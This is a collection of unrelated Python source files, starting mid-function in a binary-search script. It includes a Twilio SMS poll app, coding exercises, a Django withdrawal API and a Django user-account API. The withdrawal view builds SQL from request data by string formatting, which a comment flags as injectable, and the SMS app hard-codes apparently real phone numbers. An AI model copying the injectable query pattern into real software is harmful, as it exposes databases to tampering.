            return findXBinarySearch(min,mid-1,x)
        return findXBinarySearch(mid+1,max,x)
    else:
        if(reverse):
            return length-mid  # BUG FIX: was `lenght`, an undefined name (NameError)
        else:
            return mid+1
# --- driver (Python 2: raw_input / print statement) ---
length = int(raw_input())   # number of elements
values = raw_input()        # space-separated integers on one line
elements = [int(val) for val in values.split(" ")]
unordered = elements[:]     # keep original order for the rank queries below
# Sorted list doubles as the global `result` read by findXBinarySearch.
result = insertionSort(length,elements)
print result
# NOTE(review): insertionSort always sorts ascending, so this flag can only
# be True via duplicates/short input quirks; assumes length >= 2 — confirm.
reverse = result[0] > result[1]
for val in unordered:
    print str(findXBinarySearch(0,length,val)),
|
# Small Flask app wired to Twilio SMS webhooks.
# NOTE(review): this is Python 2 code (`print message` below) using the
# legacy twilio-python API (TwilioRestClient / twilio.twiml.Response).
from flask import Flask, request, redirect
import twilio.twiml
# Download the twilio-python library from http://twilio.com/docs/libraries
from twilio.rest import TwilioRestClient
# Find these values at https://twilio.com/user/account
# NOTE(review): credentials are blank — fill in (preferably via env vars,
# never committed to source control).
account_sid = ""
auth_token = ""
client = TwilioRestClient(account_sid, auth_token)
app = Flask(__name__)
@app.route("/sendTexts", methods=['GET', 'POST'])
def sendTexts():
    # Broadcast the same invitation SMS to four hard-coded numbers.
    # `message` is rebound each call; only the last response object is kept.
    message = client.messages.create(to="+17345520988", from_="+14243320631",
        body="Hello there! Text me back please :)")
    message = client.messages.create(to="+12018355444", from_="+14243320631",
        body="Hello there! Text me back please :)")
    message = client.messages.create(to="+16148321908", from_="+14243320631",
        body="Hello there! Text me back please :)")
    message = client.messages.create(to="+15864847275", from_="+14243320631",
        body="Hello there! Text me back please :)")
    return "YO"
@app.route("/", methods=['GET', 'POST'])
def hello_monkey():
    """Respond to incoming calls with a simple text message."""
    # Body of the incoming SMS (Twilio webhook form parameter).
    message = request.values.get('Body');
    print message
    resp = twilio.twiml.Response()
    # Stateless poll flow: "start" -> intro, "$test" -> the poll question,
    # A-D (any case) -> thanks, anything else -> error prompt.
    if(message == "start" or message == "Start"):
        resp.message("Hello and Welcome to Podium! This is a tutorial for our new platform. Please respond to this message with '$test' to subscribe and recieve a test poll! If you would like to unsubscribe at any time, text \"Stop\" to this number.")
    elif(message == "$test"):
        resp.message("What is your favorite flavor of ice cream (Please respond with A, B, C, or D)?\nA. Chocolate\nB. Vanilla\nC. Strawberry\nD. Other")
    else:
        if(message == 'a' or message == 'A' or message == 'b' or message == 'B' or message == 'c' or message == 'C' or message == 'd' or message == 'D'):
            resp.message("Thank you very much for your response! Have a great day :)")
        else:
            resp.message("Answer invalid. Please respond with A, B, C, or D.")
    return str(resp)
if __name__ == "__main__":
    app.run(debug=True)
# Read a (three-digit) number and print the sum of its decimal digits.
abc = int(input())
hundreds = abc // 100
tens = (abc % 100) // 10
ones = abc % 10
print(hundreds + tens + ones)
|
import setup
# Resolve the install path (and any permission errors) up front.
# NOTE(review): `setup` is project-local; check_permissions() is assumed to
# return a (path, errors) pair — confirm.
PATH, ERRORS = setup.check_permissions()
# Absolute path to the javac UI resource file.
JAVAC = "{}{}".format(PATH, "/resources/ui/javac.ui")
|
#!/usr/bin/python
#-*- coding:utf-8 -*-
#**********************************************************
#Filename: 177_get_max_min.py
#Author: Andrew Wang - shuguang.wang1990@gmail.com
#Description: ---
#Create: 2016-11-02 01:10:09
#Last Modified: 2016-11-02 01:10:09
#*********************************************************
# Python 2: range() returns a real list; print it and its max/min.
list_a = range(1,10)
print list_a
print max(list_a)
print min(list_a)
|
class Solution():
    """Regular-expression matching with '.' (any one char) and '*'
    (zero or more of the preceding element).

    BUG FIX: the original had a syntax error (unbalanced bracket in the
    table comprehension) and the '*' branch was an unfinished stub that
    returned an undefined name; this is the complete bottom-up DP.
    """

    def isMatch(self, s, p):
        """Return True iff pattern p matches the ENTIRE string s.

        matched[i][j] is True when s[:i] is matched by p[:j].
        O(len(s) * len(p)) time and space.
        """
        matched = [[False] * (len(p) + 1) for _ in range(len(s) + 1)]
        matched[0][0] = True  # empty pattern matches empty string
        # Patterns like "a*", "a*b*" can match the empty string.
        for j in range(2, len(p) + 1):
            if p[j - 1] == '*':
                matched[0][j] = matched[0][j - 2]
        for i in range(1, len(s) + 1):
            for j in range(1, len(p) + 1):
                pattern = p[j - 1]
                if pattern == '*':
                    # Zero occurrences of p[j-2], or one more occurrence.
                    matched[i][j] = matched[i][j - 2] or (
                        matched[i - 1][j] and (p[j - 2] == s[i - 1] or p[j - 2] == '.')
                    )
                else:
                    matched[i][j] = matched[i - 1][j - 1] and (
                        pattern == s[i - 1] or pattern == '.'
                    )
        return matched[len(s)][len(p)]
|
from rest_framework.views import APIView
from rest_framework.response import Response
from rest_framework.viewsets import ViewSetMixin
from django.http import FileResponse
import pymysql, os, time
import datetime
from django import forms
from operator import itemgetter
from itertools import groupby
from settings import conf_fun
# Hard-coded FX conversion rates used to compute payment_rmb below —
# presumably into CNY given the magnitudes. NOTE(review): static snapshot;
# confirm how/when these rates are meant to be refreshed.
currency_dict = {'USD': 6.46,
                 'CAD': 5.06,
                 'GBP': 8.87,
                 'EUR': 7.78,
                 'MXN': 0.32,
                 'JPY': 0.061,
                 'AUD': 4.96}
class Withdrawal(ViewSetMixin, APIView):
    """DRF viewset handling store withdrawal records.

    list():   stores grouped as {platform: {site: [{country, currency}]}}.
    create(): inserts one withdrawal row into the public_account table.
    """
    def __init__(self):
        # Default response envelope; msg '无' means "none".
        self.ret = {'code': 200, 'msg': '无'}
    def list(self, request):
        """Return store information grouped by platform, then by site."""
        dow_sql = "SELECT site,country,platform,currency FROM store_information "
        re_data = conf_fun.connect_mysql_operation(dow_sql, type='dict')
        re_dict = {}
        # NOTE(review): itertools.groupby only groups *consecutive* rows, so
        # this relies on the result set being ordered by platform (and site
        # within platform) — confirm; the membership checks below only
        # partially mitigate out-of-order input.
        for platform, items in groupby(re_data, key=itemgetter('platform')):
            if platform not in re_dict:
                re_dict[platform] = {}
            for site, items_1 in groupby(items, key=itemgetter('site')):
                if not re_dict[platform].get(site):
                    re_dict[platform][site] = []
                for i in items_1:
                    re_dict[platform][site].append(
                        {'country': i.get('country'), 'currency': i.get('currency')})
        self.ret['re_data'] = re_dict
        return Response(self.ret)
    def create(self, request):
        """Insert one withdrawal row assembled from the posted fields."""
        # date = time.strftime("%Y-%m-%d %H:%M", time.localtime())
        # NOTE(review): timestamp is shifted 8 minutes into the future —
        # intent unclear; confirm before relying on it.
        date = (datetime.datetime.now() + datetime.timedelta(minutes=8)).strftime("%Y-%m-%d %H:%M")
        data = request.data
        key_str = ""
        value_str = ""
        currency = data.get('currency')
        # Convert the withdrawal amount to RMB when a rate is known.
        if currency:
            amount = data.get('amount')
            x = currency_dict.get(currency)
            if x:
                payment_rmb = float(amount) * float(x)
                key_str += "payment_rmb ,"
                value_str += "'{0}' ,".format(payment_rmb)
        # Build column/value lists from a whitelist of request fields;
        # some fields are written to two columns at once.
        for k, v in data.items():
            if k in ['site', 'country', 'payment_account'] and v:
                key_str += "{0} ,".format(k)
                value_str += "'{0}' ,".format(v.strip())
            elif k == 'platform' and v:
                key_str += "{0} , source ,".format(k)
                value_str += " '{0}' , '{0}' ,".format(v)
            elif k == 'currency' and v:
                key_str += "withdrawal_currency , payment_currency ,"
                value_str += "'{0}' , '{0}' ,".format(v)
            elif k == 'amount' and v:
                key_str += "withdrawal_amount ,payment_amount ,"
                value_str += "'{0}' , '{0}' ,".format(v)
        key_str += " date,path,handling_fee,type"
        value_str += "'{0}','P卡','0','2C'".format(date)
        # SECURITY: SQL is assembled by string formatting from request data —
        # this is injectable; it should use parameterized queries instead.
        insert_sql = " INSERT INTO public_account ( {0}) values ({1})".format(key_str, value_str)
        print(insert_sql)
        conf_fun.connect_mysql_financial(insert_sql)
        return Response(self.ret)
|
# Helpers
import copy
# Shapely **HAS** to be imported before anything else.
from shapely.geometry import mapping, shape
from shapely.prepared import prep
# Project configuration code
from geoplay.project import Project
# Data sources
from geoplay.data.zcta import ZCTA
from geoplay.data.stl_parks import StlParks
# Project definition: output directory plus a plain WGS84 lat/long projection.
project = Project(
    name="Nearby Parks",
    output_dir='stl-parks',
    projection='+proj=longlat +ellps=WGS84 +datum=WGS84 +no_defs')
zcta = project.use(ZCTA)
parks = project.use(StlParks)
# Restrict to a handful of St. Louis ZIP code tabulation areas.
wanted_zips = zcta.filterTo(zipCodes=[63108, 63118, 63103, 63104, 63110])
for zip_area in wanted_zips:
    # puff the bounds of the zip codes out 0.001 arcradians
    loose_zip_bounds = shape(zip_area['geometry']).buffer(0.001)
    # Make a list of parks that touch our new expanded ZIP
    touching_parks = list(filter(
        lambda p: loose_zip_bounds.intersects(shape(p['geometry'])),
        parks.shapefile()))
    # Update the geometry in the shapefile
    zip_area['geometry'] = mapping(loose_zip_bounds)
    # Write our variables (park count and comma-joined park names).
    zip_area['properties']['PARKCOUNT'] = len(touching_parks)
    zip_area['properties']['PARKNAMES'] = ', '.join([p['properties']['TEXT_'] for p in touching_parks ])
# Write out our final layer with an explicit output schema.
project.save_layer(
    name='nearby-park-counts',
    using_data=wanted_zips,
    variables={
        'ZCTA5CE10': {'type': 'str', 'from_data': 'ZCTA5CE10'},
        'PARKCOUNT': {'type': 'int', 'from_data': 'PARKCOUNT'},
        'PARKNAMES': {'type': 'str', 'from_data': 'PARKNAMES'},
    })
# Also emit a CSV of the per-ZIP park variables.
project.save_csv(name='zip_parks', using_data=wanted_zips)
|
# Use urllib.request in place of the Python 2 urllib2 module
import urllib.request
url = "http://www.baidu.com"
# urllib.request.urlopen() replaces urllib2.urlopen()
response1 = urllib.request.urlopen(url)
# Print the HTTP status code of the response
print(response1.getcode())
# Print the length of the fetched page content
print(len(response1.read()))
|
from django.urls import path
from employee.views import EmployeeListAPIView, AddEmployeeAPIView, EmployeeAPIView
urlpatterns = [
    # Create a new employee.
    path('', AddEmployeeAPIView.as_view(), name='create-employee'),
    # Operate on a single employee selected by primary key.
    path('<int:pk>', EmployeeAPIView.as_view(), name='employee-view'),
    # List all employees.
    path('list', EmployeeListAPIView.as_view(), name='employee-list'),
]
|
def digit_sum(x):
    """Sum of the decimal digits of non-negative integer x."""
    return sum(int(d) for d in str(x))

def solve(n, a, b):
    """Sum of every i in [0, n] whose digit sum lies in [a, b] inclusive."""
    return sum(i for i in range(n + 1) if a <= digit_sum(i) <= b)

if __name__ == "__main__":
    # Input: one line "n a b"; output: the required sum.
    n, a, b = map(int, input().split(" "))
    print(solve(n, a, b))
# Name fragments for building English number names; 0 maps to '' on purpose.
num_dict = {0:'', 1:'one', 2:'two', 3:'three', 4:'four', 5:'five', 6:'six', 7:'seven', 8:'eight', 9:'nine',
            10:'ten', 11:'eleven', 12:'twelve', 13:'thirteen', 14:'fourteen', 15:'fifteen', 16:'sixteen', 17:'seventeen', 18:'eighteen', 19:'nineteen',
            20:'twenty', 30:'thirty', 40:'forty', 50:'fifty', 60:'sixty', 70:'seventy', 80:'eighty', 90:'ninety',
            100:'hundred'}
def num(i):
    """Return the English name of i (expected 1..1000).

    Quirks preserved deliberately — secret_room's alphabetical ordering
    depends on the exact strings produced:
      - num(0) == '' and exact tens/hundreds get a trailing space
        (e.g. num(20) == 'twenty ', num(300) == 'three hundred ').
      - the `if not i//10` / `if not i//100` guards are dead code in their
        branches (i >= 20 / i >= 100 there).
    """
    if i < 20:
        return num_dict[i]
    elif i < 100:
        if not i//10:  # NOTE(review): unreachable — i >= 20 here
            return num_dict[i]
        else:
            return num_dict[i//10*10]+' '+num_dict[i%10]
    elif i < 1000:
        temp = num_dict[i//100] + ' hundred'
        if not i//100:  # NOTE(review): unreachable — i >= 100 here
            return temp
        else:
            return temp+' '+num(i%100)
    return 'one thousand'
def secret_room(number):
    """Return the 1-based position of `number`'s English name among the
    names of 1..number sorted alphabetically (plain string sort)."""
    names = sorted(num(i) for i in range(1, number + 1))
    return names.index(num(number)) + 1
if __name__ == '__main__':
    # NOTE(review): result discarded — looks like leftover scratch; confirm
    # before removing.
    secret_room(666)
    print("Example:")
    print(secret_room(5))
    #These "asserts" using only for self-checking and not necessary for auto-testing
    assert secret_room(5) == 1 #five, four, one, three, two
    assert secret_room(3) == 2 #one, three, two
    assert secret_room(1000) == 551
    print("Coding complete? Click 'Check' to earn cool rewards!")
|
from .source_list import SourceListModel
from .appraiser_tx import AppraiserTexas
from .inspector_tx import InspectorTexas
from .real_estate_sales_agent_tx import RealEstateSalesAgentTexas
from .re_license_applicant_tx import RealEstateSalesAgentApplicantTexas
from .real_estate_sales_agent_ok import RealEstateSalesAgentOklahoma
|
import random

# Emit a random test case: a count followed by that many random integers
# in [0, 100000], space-separated on one line (trailing space preserved).
n = int(input())
mylist = [random.randint(0, 100000) for _ in range(n)]
print(n)
for value in mylist:
    print(value, end=" ")
|
# coding=utf-8
from .models import *
from django.http import HttpResponse
from django.contrib.auth import authenticate, login, logout
from django.views.decorators.http import require_http_methods
from django.core.files.base import ContentFile
import json
from .serializer import *
from .message_templates import send_application
from .utilities import send_message, authentication, cmp_to_key
from .tag import get_tag
from .feature import update_feature, similarity, compare_construct
'''
get_user:
get user info by id
GET param
---------------------------------------------------------------------
| param | introduction | default |
|===================================================================|
| id | id of user | REQUIRED |
|===================================================================|
returns:
'state_code'
'user_info' -- when (state_code == 0)
'''
def get_user(request, id):
    """Fetch one user by primary key and return its serialized info as JSON.

    state_code: 0 ok (with 'user_info'), 2 when no such user exists.
    """
    ret = {}
    try:
        ret['user_info'] = user_serialize(User.objects.get(id=id))
        ret['state_code'] = 0
    except User.DoesNotExist:
        ret['state_code'] = 2
    return HttpResponse(json.dumps(ret), content_type='application/json')
'''
login_detail:
get user detail that is currently logged in
No params required
returns:
'state_code'
'user_info' -- when (state_code == 0)
'''
def login_detail(request):
    """Return serialized info for the currently logged-in user.

    state_code: 0 ok (with 'user_info'), 1 when nobody is logged in.
    """
    ret = {}
    user = request.user
    if user.is_authenticated():
        ret['state_code'] = 0
        ret['user_info'] = user_serialize(user)
    else:
        ret['state_code'] = 1
    return HttpResponse(json.dumps(ret), content_type='application/json')
'''
update_user:
update user info(only by admin and user itself)
POST params
---------------------------------------------------------------------
| param | introduction | default |
|===================================================================|
| email | email of user | REQUIRED |
| name | name of user | No Default |
| intro | introduction of user | No Default |
| tags | tags of act (delimited by ',') | '' |
| cellphone | cellphone of user | No Default |
| fix_times | fix times of user | No Default |
| tmp_times | temp times of user | No Default |
|===================================================================|
returns:
'state_code'
'user_info' -- when (state_code == 0)
'''
@require_http_methods(['POST'])
def update_user(request):
    """Update a user's profile fields and tags (admin or the user itself).

    POST: 'email' (required, selects the user), plus any of name/cellphone/
    intro/fix_times/tmp_times, and a comma-delimited 'tags' string.
    state_code: 0 ok, 1 not logged in, 2 no such user, 3 forbidden,
    4 missing email.
    """
    ret = dict()
    email = request.POST.get('email')
    if not email:
        ret['state_code'] = 4
    elif not request.user.is_authenticated():
        ret['state_code'] = 1
    elif (not str(request.user.email) == email) and (not request.user.is_admin == True):
        # Only the account owner or an admin may update.
        ret['state_code'] = 3
    else:
        try:
            user = User.objects.get(email=email)
            ### update normal fields
            # Whitelist of directly assignable attributes.
            editable_fields = [
                'name',
                'cellphone',
                'intro',
                'fix_times',
                'tmp_times',
            ]
            items = request.POST.items()
            for (k, v) in items:
                if k in editable_fields:
                    setattr(user, k, v)
            ### update tags
            # Replace the whole tag set: clear existing tags, then re-add
            # from the 'tags' parameter (get_tag creates missing tags).
            # NOTE(review): an empty 'tags' value still yields [''] and so
            # adds an empty-named tag — confirm get_tag handles this.
            for tag in user.tags.all():
                user.tags.remove(tag)
            for tag in request.POST.get('tags', '').split(','):
                user.tags.add(get_tag(tag.strip()))
            user.save()
            user.update_feature()  # recompute the recommendation feature vector
            ret['state_code'] = 0
            ret['user_info'] = user_serialize(user, False)
        except User.DoesNotExist:
            ret['state_code'] = 2
    return HttpResponse(json.dumps(ret), content_type='application/json')
'''
update_portrait:
update the portrait of a member
POST params
---------------------------------------------------------------------
| param | introduction | default |
|===================================================================|
| img(file) | portrait of user | REQUIRED |
|===================================================================|
'''
def update_portrait(request):
    """Replace the authenticated user's portrait with the uploaded file.

    Returns state_code 0 plus 'portrait_url' on success, or the failure
    code produced by authentication().
    NOTE(review): the doc block above says the upload field is 'img' but
    the code reads request.FILES['file'] — confirm which one the client
    actually sends.
    """
    ret = dict()
    r = authentication(request,
                       required_param=[],
                       require_authenticate=True)
    if not r['state_code'] == 0:
        ret['state_code'] = r['state_code']
    else:
        # (removed leftover debug prints of request.FILES)
        user = request.user
        user.portrait = request.FILES['file']
        user.save()
        ret['state_code'] = 0
        ret['portrait_url'] = user.portrait.url
    return HttpResponse(json.dumps(ret), content_type='application/json')
'''
update_password:
update user password(only by admin and user itself), automatically
logout when succeeded
POST params
---------------------------------------------------------------------
| param | introduction | default |
|===================================================================|
| email | email of user | REQUIRED |
| password | password of user | REQUIRED |
|===================================================================|
returns:
'state_code'
'''
@require_http_methods(['POST'])
def update_password(request):
    """Change a user's password (admin or the user itself).

    POST: 'email' and 'password' (both required).
    state_code: 0 ok, 1 not logged in, 2 no such user, 3 forbidden,
    4 missing email, 5 missing password.
    """
    ret = dict()
    email = request.POST.get('email')
    if not email:
        ret['state_code'] = 4
    elif not request.user.is_authenticated():
        ret['state_code'] = 1
    elif not (str(request.user.email) == email or request.user.is_admin == True):
        # Only the account owner or an admin may change the password.
        ret['state_code'] = 3
    else:
        try:
            user = User.objects.get(email=email)
            password = request.POST.get('password')
            if not password:
                ret['state_code'] = 5
            else:
                user.set_password(password)  # hashes; persisted by save() below
                ret['state_code'] = 0
                user.save()
        except User.DoesNotExist:
            ret['state_code'] = 2
    return HttpResponse(json.dumps(ret), content_type='application/json')
'''
delete_user:
delete user account(only admin and user itself)
POST params
---------------------------------------------------------------------
| param | introduction | default |
|===================================================================|
| email | email of user | REQUIRED |
|===================================================================|
returns:
'state_code'
'''
@require_http_methods(['POST'])
def delete_user(request):
    """Delete a user account (admin or the account owner only).

    POST: 'email' (required). state_code: 0 ok, 1 not logged in,
    2 no such user, 3 forbidden, 4 missing email.
    """
    ret = dict()
    email = request.POST.get('email')
    user = request.user
    if not email:
        ret['state_code'] = 4
    elif not user.is_authenticated():
        ret['state_code'] = 1
    elif user.email != email and user.is_admin != True:
        ret['state_code'] = 3
    else:
        try:
            User.objects.get(email=email).delete()
            ret['state_code'] = 0
        except User.DoesNotExist:
            ret['state_code'] = 2
    return HttpResponse(json.dumps(ret), content_type='application/json')
'''
user_exist:
check if a email is used
GET params
---------------------------------------------------------------------
| param | introduction | default |
|===================================================================|
| email | email of user | REQUIRED |
|===================================================================|
returns
'used'
'''
def user_exist(request, email):
    """Report whether an account with this email already exists.

    Returns JSON {'used': bool}.
    """
    ret = dict()
    # exists() issues a cheap EXISTS query instead of materializing the
    # whole queryset just to take len() of it.
    ret['used'] = User.objects.filter(email=email).exists()
    return HttpResponse(json.dumps(ret), content_type='application/json')
'''
user_register:
register a new user
POST params
---------------------------------------------------------------------
| param | introduction | default |
|===================================================================|
| email | email of user | REQUIRED |
| password | password of user | REQUIRED |
| name | name of user | 'anonymous' |
| intro | introduction of user | '' |
| tags | tags of act (delimited by ',') | '' |
| cellphone | cellphone of user | '' |
| fix_times | fix times of user | 0 |
| portrait | user portrait(not implemented) | not implemented |
|===================================================================|
returns:
'state_code'
'user_info' -- when (state_code == 0 or state_code == 6)
'''
@require_http_methods(['POST'])
def user_register(request):
    """Create a new account from POSTed email/password (+ optional name).

    state_code: 0 ok (with 'user_info'), 6 already logged in,
    9 missing email or password, 10 email already registered.
    """
    ret = dict()
    if request.user.is_authenticated():
        ret['state_code'] = 6
        ret['user_info'] = user_serialize(request.user)
    else:
        user_info = dict()
        user_info['name'] = request.POST.get('name', 'anonymous')
        user_info['password'] = request.POST.get('password', '')
        # user_info['portrait'] = request.POST.get('portrait')
        user_info['email'] = request.POST.get('email', '')
        # user_info['fix_times'] = request.POST.get('fix_times', 0)
        # user_info['cellphone'] = request.POST.get('cellphone', '')
        # user_info['intro'] = request.POST.get('intro', '')
        # user_info['tags'] = [s.strip() for s in request.POST.get('tags', '').split(',')]
        if user_info['email'] != '' and user_info['password'] != '':
            # try:
            # User.objects.get(email=user_info['email'])
            # ret['state_code'] = 10
            # except User.DoesNotExist:
            # Uniqueness check: reject if the email is already taken.
            u = User.objects.filter(email=user_info['email'])
            if not len(u) == 0:
                ret['state_code'] = 10
            else:
                user = User.objects.create_user(
                    user_info['email'],
                    user_info['password'],
                    name = user_info['name']
                )
                # user.portrait = user_info['portrait']
                # user.fix_times = user_info['fix_times']
                # user.cellphone = user_info['cellphone']
                # user.intro = user_info['intro']
                # for s in user_info['tags']:
                #     if not s == '':
                #         try:
                #             tag = Tag.objects.get(name=s)
                #         except:
                #             tag = Tag()
                #             tag.name = s
                #             tag.save()
                #         user.tags.add(tag)
                user.save()
                ret['state_code'] = 0
                ret['user_info'] = user_serialize(user)
        else:
            ret['state_code'] = 9
    return HttpResponse(json.dumps(ret), content_type='application/json')
'''
user_login:
    user login
    POST params
    ---------------------------------------------------------------------
    | param | introduction | default |
    |===================================================================|
    | email | email of user | REQUIRED |
    | password | password of user | REQUIRED |
    |===================================================================|
    returns:
        'state_code'
        'user_info' -- when (state_code == 0)
'''
@require_http_methods(['POST'])
def user_login(request):
    """Authenticate and log a user in.

    State codes: 0 success, 6 already logged in, 7 account inactive,
    8 bad credentials.
    """
    ret = dict()
    if request.user.is_authenticated():
        ret['state_code'] = 6
        ret['user_info'] = user_serialize(request.user)
    else:
        email = request.POST.get('email', '')
        password = request.POST.get('password', '')
        user = authenticate(email=email, password=password)
        if user is not None:
            if user.is_active:
                login(request, user)
                # FIX: removed unused local `name = user.name`.
                ret['state_code'] = 0
                ret['user_info'] = user_serialize(user)
            else:
                ret['state_code'] = 7  # account disabled
        else:
            ret['state_code'] = 8  # wrong email/password
    return HttpResponse(json.dumps(ret), content_type='application/json')
'''
user_logout:
    user logout
    No params required
    returns:
        'state_code'
'''
def user_logout(request):
    """Log the current user out. State codes: 0 ok, 1 not logged in."""
    if request.user.is_authenticated():
        logout(request)
        code = 0
    else:
        code = 1
    return HttpResponse(json.dumps({'state_code': code}),
                        content_type='application/json')
'''
get_admin_activity:
    get activities that user has admin permission
    GET
    returns:
        'state_code'
        'admin_acts' -- when (state_code == 0)
'''
def get_admin_activity(request):
    """Return the activities the current user administers.

    State codes: 0 ok, otherwise the code produced by authentication().
    """
    ret = dict()
    r = authentication(request, require_authenticate=True)
    if not r['state_code'] == 0:
        ret['state_code'] = r['state_code']
    else:
        # BUG FIX: the success branch previously never set 'state_code',
        # although the contract above promises it in every response.
        ret['state_code'] = 0
        ret['admin_acts'] = [activity_serialize(act)
                             for act in request.user.admin_acts.all()]
    return HttpResponse(json.dumps(ret), content_type='application/json')
'''
get_admin_activity:
    get activities that user joins in.
    GET
    returns:
        'state_code'
        'join_acts' -- when (state_code == 0)
        'apply_acts_member'
        'apply_acts_admin'
'''
def get_join_activity(request):
    """Return activities the user joined plus pending member/admin applications.

    State codes: 0 ok, otherwise the code produced by authentication().
    """
    ret = dict()
    r = authentication(request, require_authenticate=True)
    if not r['state_code'] == 0:
        ret['state_code'] = r['state_code']
    else:
        # BUG FIX: the success branch previously never set 'state_code',
        # although the contract above promises it in every response.
        ret['state_code'] = 0
        ret['join_acts'] = [activity_serialize(act)
                            for act in request.user.join_acts.all()]
        # application_type: 1 == membership request, 2 == admin request.
        ret['apply_acts_member'] = [
            activity_serialize(app.activity)
            for app in request.user.applications.filter(application_type=1)]
        ret['apply_acts_admin'] = [
            activity_serialize(app.activity)
            for app in request.user.applications.filter(application_type=2)]
    return HttpResponse(json.dumps(ret), content_type='application/json')
'''
apply_for_activity:
    apply activity permission (member/admin)
    POST params
    ---------------------------------------------------------------------
    | param | introduction | default |
    |===================================================================|
    | act_id | id of activity | REQUIRED |
    | type | 1 for member / 2 for admin | 1 |
    | intro | introduction of user itself | 'no introduction' |
    |===================================================================|
    returns:
        'state_code'
'''
@require_http_methods(['POST'])
def apply_for_activity(request):
    """Apply for member (type '1') or admin (type '2') permission on an activity.

    State codes: 0 ok, 1 not logged in, 11 bad type, 51 missing act_id,
    51/52 unknown activity, 53 duplicate application, 54 admin application
    without being a member, 55 already a member, 56 already an admin.
    Notifies every current admin of the activity via send_message().
    """
    ret = dict()
    act_id = request.POST.get('act_id')
    # BUG FIX: the default used to be the int 1, which can never pass the
    # `app_type in ['1', '2']` check below -- omitting 'type' always yielded
    # state 11 even though the docs promise a default of 1. POST values are
    # strings, so the default must be the string '1'.
    app_type = request.POST.get('type', '1')
    if not request.user.is_authenticated():
        ret['state_code'] = 1
    elif not act_id:
        ret['state_code'] = 51
    elif not app_type in ['1', '2']:
        ret['state_code'] = 11
    else:
        act = Activity.objects.filter(id=act_id)
        intro = request.POST.get('intro', 'no introduction')
        if len(act) == 0:
            ret['state_code'] = 51
        elif len(act[0].applications.filter(
                applicant_id=request.user.id,
                application_type=app_type)) > 0:
            ret['state_code'] = 53  # identical application already pending
        elif app_type == '1' and len(act[0].members.filter(id=request.user.id)) > 0:
            ret['state_code'] = 55
        elif app_type == '2' and len(act[0].admins.filter(id=request.user.id)) > 0:
            ret['state_code'] = 56
        elif app_type == '2' and len(act[0].members.filter(id=request.user.id)) == 0:
            ret['state_code'] = 54  # must be a member before applying as admin
        else:
            app = Application.objects.create(
                applicant=request.user,
                application_type=app_type,
                activity=act[0],
                intro=intro
            )
            app.save()
            # Let every admin of the activity know about the new application.
            for admin in act[0].admins.all():
                send_message(request.user, admin,
                             send_application(
                                 request.user.name,
                                 act[0].name,
                                 admin.name,
                                 app_type),
                             1,
                             user_id=request.user.id,
                             act_id=act[0].id)
            request.user.save()
            ret['state_code'] = 0
    return HttpResponse(json.dumps(ret), content_type='application/json')
'''
quit_activity:
    Quit activity. User is Deleted from 'applicants', 'admins'
    and 'members'. Applications are also deleted.
    POST params
    ---------------------------------------------------------------------
    | param | introduction | default |
    |===================================================================|
    | act_id | id of activity | REQUIRED |
    |===================================================================|
    returns:
        'state_code'
'''
@require_http_methods(['POST'])
def quit_activity(request):
    """Detach the current user from an activity entirely.

    Removes the user from applicants/admins/members and deletes the
    user's pending applications. State codes: 0 ok, 1 not logged in,
    51 missing act_id, 52 unknown activity.
    """
    user = request.user
    act_id = request.POST.get('act_id')
    if not user.is_authenticated():
        code = 1
    elif not act_id:
        code = 51
    else:
        matches = Activity.objects.filter(id=act_id)
        if len(matches) == 0:
            code = 52
        else:
            activity = matches[0]
            activity.applicants.remove(user)
            activity.admins.remove(user)
            activity.members.remove(user)
            activity.applications.filter(applicant_id=user.id).delete()
            code = 0
    return HttpResponse(json.dumps({'state_code': code}),
                        content_type='application/json')
'''
get_message:
    get message list of a user
    POST params
    ---------------------------------------------------------------------
    | param | introduction | default |
    |===================================================================|
    | id | id of user | REQUIRED |
    | setting | 0: all messages | 0 |
    | | 1: all messages sent by user | |
    | | 2: all messages sent to user | |
    | | 3: all unread messages | |
    |===================================================================|
    returns:
        'state_code'
        'messages' -- when (state_code = 0)
'''
@require_http_methods(['POST'])
def get_message(request):
    """Return a user's messages filtered by `setting` (see table above).

    Requires authentication and permission on the target user.
    """
    ret = dict()
    setting = int(request.POST.get('setting', 0))
    r = authentication(request,
                       required_param=['id'],
                       require_authenticate=True,
                       require_model=True,
                       require_permission=True,
                       model=User,
                       keytype='id')
    if not r['state_code'] == 0:
        ret['state_code'] = r['state_code']
    else:
        user = r['record']
        ret['messages'] = []
        ret['state_code'] = 0
        if setting == 0:
            # Sent and received messages, merged in chronological order.
            msgs = sorted(user.sent_messages.all() | user.messages.all(), key=lambda x: x.time)
            for m in msgs:
                ret['messages'].append(message_serialize(m))
        elif setting == 1:
            # BUG FIX: this loop iterated over `x` but serialized a stale
            # `m` left over from another branch (NameError on a fresh
            # request, or setting-0 data otherwise).
            for m in user.sent_messages.all():
                ret['messages'].append(message_serialize(m))
        elif setting == 2:
            for m in user.messages.all():
                ret['messages'].append(message_serialize(m))
        elif setting == 3:
            for m in user.messages.filter(read=False):
                ret['messages'].append(message_serialize(m))
    return HttpResponse(json.dumps(ret), content_type='application/json')
'''
set_message_state:
    set message read state
    GET param
    ---------------------------------------------------------------------
    | param | introduction | default |
    |===================================================================|
    | id | id of message | REQUIRED |
    | state | state of msg user want to set | REQUIRED |
    |===================================================================|
    returns:
        'state_code'
'''
def set_message_state(request, id, state):
    """Mark a message read ('1') or unread ('0').

    State codes: 0 ok, 3 not owner/admin, 31 unknown message,
    32 invalid state value.
    """
    ret = dict()
    matches = Message.objects.filter(id=id)
    if len(matches) == 0:
        ret['state_code'] = 31
    else:
        msg = matches[0]
        may_edit = request.user.is_admin == True or msg.to_user.id == request.user.id
        if not may_edit:
            ret['state_code'] = 3
        elif state in ('0', '1'):
            msg.read = (state == '1')
            ret['state_code'] = 0
            msg.save()
        else:
            ret['state_code'] = 32
    return HttpResponse(json.dumps(ret), content_type='application/json')
'''
send_message_post:
    send message
    POST param
    ---------------------------------------------------------------------
    | param | introduction | default |
    |===================================================================|
    | id | id of user(send to) | REQUIRED |
    | content | content of message | REQUIRED |
    |===================================================================|
'''
def send_message_post(request):
    """Send a plain (type 0) message from the current user to user `id`."""
    auth = authentication(request,
                          required_param=['id', 'content'],
                          require_authenticate=True,
                          require_model=True,
                          model=User,
                          keytype='id')
    code = auth['state_code']
    if code == 0:
        send_message(request.user, auth['record'], auth['params']['content'], 0)
    return HttpResponse(json.dumps({'state_code': code}),
                        content_type='application/json')
'''
follow:
    follow another user
    POST param
    ---------------------------------------------------------------------
    | param | introduction | default |
    |===================================================================|
    | id | id of user(to be followed) | REQUIRED |
    |===================================================================|
